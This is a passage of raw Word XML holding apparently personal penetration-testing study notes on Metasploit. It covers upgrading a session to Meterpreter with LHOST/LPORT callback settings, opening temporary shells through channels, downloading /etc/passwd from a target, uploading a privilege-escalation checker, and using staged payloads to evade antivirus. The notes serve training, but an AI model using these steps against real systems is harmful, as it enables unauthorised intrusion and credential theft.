    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000664">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get into the module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000665">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="144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666">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set SESSION &lt;session_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000667">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST &lt;your_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000668">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set LPORT &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000669">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000066A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000066B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for your new meterpreter upgraded session!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000066C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i &lt;new_session_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000066D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000066E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000066F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cs5q41horn43" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Temporary shell in Meterpreter (Channels)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000670">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000671">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While inside meterpreter, you can't use certain commands like "find" and "whoami." But, you can get into a shell temporarily to run those:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000672">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000673">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run your commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000674">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>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0675">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1084"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get back into meterpreter</w:t>
      </w:r>
    </w:p>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">channel -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000678">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List all channels (temporary shells)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000679">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000067A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">channel -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000067B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Interact with channel (shell) number 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000067C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_brrxpg6ma4kx" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to interact with local files while using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000067F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4806819" cy="2529353"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="190" name="image201.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image201.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId164"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4806819" cy="2529353"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1310"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 41 shows that we could successfully download /etc/passwd to our local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000681">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000682">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, let's assume we want to run unix-privesc-check like in a previous Module to find potential privilege escalation vectors. Let's upload the file to /tmp on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000683">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2286000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="363" name="image345.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image345.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId165"/>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t xml:space="preserve">Listing 42 shows that we successfully uploaded </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unix-privesc-check</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the target machine. If our target runs the Windows operating system, we need to escape the backslashes in the destination path with backslashes like "\\".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000686">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="824"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like C:\\Users\\Administrator\\Desktop\\tool.exe instead of C:\Users\Administrator\Desktop\tool.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000687">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_430go0vwrudb" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Staged vs. Non-Staged Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000688">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000689">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The difference between these payload types is subtle but important. A </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">non-staged</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload is sent in its entirety along with the exploit. This means the payload contains the exploit and full shellcode for a selected task. In general, these "all-in-one" payloads are more stable. The downside is that the size of these payloads will be bigger than other types.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000068A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In contrast, a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">staged</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload is usually sent in two parts. The first part contains a small primary payload that causes the victim machine to connect back to the attacker, transfer a larger secondary payload containing the rest of the shellcode, and then execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000068B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There are several situations in which we would prefer to use a staged payload instead of non-staged. If there are space-limitations in an exploit, a staged payload might be a better choice as it is typically smaller. In addition, we need to keep in mind that antivirus software can detect shellcode in an exploit. By replacing the full code with a first stage, which loads the second and malicious part of the shellcode, the remaining payload is retrieved and injected directly into the victim machine's memory. This may prevent detection and can increase our chances of success.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000068C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4814888" cy="2245404"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId166"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4814888" cy="2245404"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000068D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="750"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Metasploit, the "/" character is used to denote whether a payload is staged or not, so shell_reverse_tcp at index 20 is not staged, whereas shell/reverse_tcp at index 15 is.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000068E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000068F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000690">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uikcrp3udwha" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to upload .rb modules to Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000691">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000692">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes you will find a module in searchsploit that is supposed to be run in Metasploit, and it will be in Ruby format since that's what Metasploit is written in. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000693">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000694">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In order to upload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000695">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1236"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/.msf4/modules</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000696">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1236"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now from here, you have to create subdirectories depending on where the module should be located within Metasploit. </w:t>
      </w:r>
    </w:p>
